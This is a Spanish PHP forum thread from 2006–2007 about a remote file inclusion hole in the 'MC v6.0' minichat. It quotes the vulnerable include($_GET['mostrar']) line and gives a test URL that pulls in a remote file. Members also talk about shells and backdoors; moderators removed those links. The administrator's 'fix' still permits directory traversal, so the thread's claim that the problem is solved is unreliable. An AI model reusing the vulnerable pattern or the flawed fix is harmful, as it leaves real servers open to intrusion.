Autor Tema: ¿Es cierto que el MC v6.0 es Hackeable?  (Leído 5882 veces)

Desconectado sagitari

  • PHPer@
  • **
  • Mensajes: 86
  • Karma: 10
  • Sexo: Femenino
  • "A&X&me...4ever"
    • Ver Perfil
    • http://freewebtown.com/sagitari
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #15 en: 06 de Noviembre de 2006, 18:55:21 pm »
Con el bug que tiene el MC puede accederse a TODAS las carpetas del servidor, aunque tambien son necesarios conocimientos para usar una shell..

Tampoco hace falta ser muy listo,a para usar una shell.
Sólo que si no tienes permisos de escritura, ya hay que saber un poco más sobre cómo meter un backdoor para obtener permisos root en todos los directorios,archivos.


http://freewebtown.com/sagitari

Web para aprender a hacer una web desde cero ^^

Videotutoriales y demás.

Comunidad PHPeros

Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #15 en: 06 de Noviembre de 2006, 18:55:21 pm »

Desconectado xemy

  • PHPerit@
  • *
  • Mensajes: 40
  • Karma: 2
  • Sexo: Masculino
  • <php>¿te gustaria aprender?<php>
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #16 en: 07 de Noviembre de 2006, 16:07:25 pm »
pero el codigo cuando se pone sale esto nada más poner tu nombre el codigo y le das a aceptar.
Código: [Seleccionar]
Remote File Inclusion - Not allowed On this Server [Patch by H1r0]
<php>¿seras capaz de hacer maravillas?</php>

Conectado naveda

  • Administrador General
  • PHPero Master
  • *****
  • Mensajes: 2.282
  • Karma: 165
  • Sexo: Masculino
    • Ver Perfil
    • naveda.me
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #17 en: 07 de Noviembre de 2006, 18:07:28 pm »
xemy no he entendido lo que querias decir Xd :S
Por favor, leete las Normas


Desconectado Pc-Admin

  • PHPer@ Fijo
  • ***
  • Mensajes: 118
  • Karma: 3
  • Sexo: Masculino
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #18 en: 16 de Noviembre de 2006, 18:22:44 pm »
Lo que el quiere decir, esque cada vez que una persona escrive por el minichat, le sale el texto ese, es como si le intentaran hackear el mc todo el rato xD.
Todo en esta vida, es practicar.

Desconectado xemy

  • PHPerit@
  • *
  • Mensajes: 40
  • Karma: 2
  • Sexo: Masculino
  • <php>¿te gustaria aprender?<php>
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #19 en: 16 de Noviembre de 2006, 21:11:36 pm »
 ;) Si eso es Pc-admin pero esque nose porque me sale eso  siempre que me registro sale esa frase, y para escribir en el MC me pasa igual.
<php>¿seras capaz de hacer maravillas?</php>

Desconectado Rixard

  • PHPerit@
  • *
  • Mensajes: 1
  • Karma: 0
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #20 en: 28 de Noviembre de 2006, 23:35:29 pm »
Si... Aunque es un buen minichat, nada es perfecto. en mi web puse algunos ejemplos de Exploits que se utilizan para entrar.... Creo sinceramente que el punto mas devil es que descuidan la pusibilidad de ejecutar comandos dentro del mismo servidor... entre ellos " _GET ". No obstante lo tendre todo en cuenta al realizar la version que tengo en mente para la version Mc de zona 1911.org.


 Un saludo.
Rixard

Desconectado Antonio285

  • PHPer@ Fijo
  • ***
  • Mensajes: 194
  • Karma: 0
  • Sexo: Masculino
  • No hay mal que por bien no venga..
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #21 en: 07 de Diciembre de 2006, 13:32:11 pm »
No se pero ese Parche como ke no va nada, porque igual puede hacer eso
-.-''

NOTA MOD: El tema de la shell y los conceptos de manipulación sin permisos se desentienden con la filosofía del foro. No lo postees aquí.  *Direccion eliminada*

Pues vaia salvasion el H1r0 ese x'D
« Última modificación: 09 de Diciembre de 2006, 00:15:46 am por Raken »

Desconectado DcK

  • PHPerit@
  • *
  • Mensajes: 26
  • Karma: 0
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #22 en: 11 de Diciembre de 2006, 15:06:03 pm »
Ahy un amigo mio, se llama KX-T33 Que lo hace hasta con los ojos cerrados, lo que hace es crearse el rango que tienes debajo del owner en u n par de sgundos, como no se nada de hacking, si me pusiera a investigar, tambien seria facil para to2...
Kaoz MC

Desconectado JuAnCHO

  • PHPero Avanzado
  • ****
  • Mensajes: 327
  • Karma: 1
  • Sexo: Masculino
  • 33 Y Truco xD
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #23 en: 11 de Diciembre de 2006, 17:39:39 pm »
Ahy un amigo mio, se llama KX-T33 Que lo hace hasta con los ojos cerrados, lo que hace es crearse el rango que tienes debajo del owner en u n par de sgundos, como no se nada de hacking, si me pusiera a investigar, tambien seria facil para to2...
Hablas como si fuese cocer y cantar.
Si tu no sabes fabricar un objeto, e investigas un rato, seria fácil ?
Sin comentarios ... xD

-----------------------------------------------------------------
" A un gran corazón ninguna ingratitud lo cierra,
   ninguna indeferencia lo cansa ".

Desconectado KX-T33

  • PHPerit@
  • *
  • Mensajes: 4
  • Karma: 0
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #24 en: 12 de Diciembre de 2006, 01:37:57 am »
Tio... para cuando kieres nos Medimos ;) DcK no es necesario que le digas a esta gente nada de esto.. = tu sabes que si lo hago! ;) un saludote!

A Miren aqui les dejo una Shell ;) para que prueben con un MC de prueba!
URL NO PERMITIDA, Contenido que viola las normas del foro
_________________________________________________________
DIV - KXTEAM - Am0sTeam
« Última modificación: 14 de Diciembre de 2006, 17:04:52 pm por naveda »

Desconectado !R3t!

  • PHPerit@
  • *
  • Mensajes: 33
  • Karma: -3
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #25 en: 06 de Enero de 2007, 23:11:51 pm »
Pero, desde que lo parchee no puedo enviar alertas,  hay alguna forma de parchearlo pudiendo mandar alrtas¿?

Conectado naveda

  • Administrador General
  • PHPero Master
  • *****
  • Mensajes: 2.282
  • Karma: 165
  • Sexo: Masculino
    • Ver Perfil
    • naveda.me
SOLUCIÓN: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #26 en: 06 de Enero de 2007, 23:14:17 pm »
Trás probar el codigo... He deducido que no FUNCIONA!!! xD
Realmente impide el RFI pero es que no impide solamente eso sino que impide que se incluya cualquier archivo...

Yo me he dado cuenta que la solución era tan sencilla como:
include("./".$_GET[&#39;mostrar&#39;]);

Por tanto, debeis substituir la linea:
<? include($_GET[&#39;mostrar&#39;]); ?>
Por esta otra:
include("./".$_GET[&#39;mostrar&#39;]);

Probadlo si quereis haciendo lo siguiente:
http://www.tuweb.com/carpetaMC/ftag.php?mostrar=http://www.phperos.net/rfi.txt

Por favor, leete las Normas


Desconectado kekoman

  • PHPero Master
  • ******
  • Mensajes: 1.180
  • Karma: 45
  • Sexo: Masculino
  • Mi nuevo usuario es marco811
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #27 en: 06 de Enero de 2007, 23:20:19 pm »
otra opcion es crear una cuenta FTP solamente para el MC!


Este usuario ya no lo uso, mi nuevo usuario es marco811

Desconectado !R3t!

  • PHPerit@
  • *
  • Mensajes: 33
  • Karma: -3
    • Ver Perfil
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #28 en: 06 de Enero de 2007, 23:21:20 pm »
Ya, pero si te hackean, te hackean el mc, y tonces... pos tambien duele xd

Conectado naveda

  • Administrador General
  • PHPero Master
  • *****
  • Mensajes: 2.282
  • Karma: 165
  • Sexo: Masculino
    • Ver Perfil
    • naveda.me
Re: ¿Es cierto que el MC v6.0 es Hackeable?
« Respuesta #29 en: 06 de Enero de 2007, 23:23:57 pm »
Hacedme caso, FUNCIONA ;)
El problema esta solucionado :D
Por favor, leete las Normas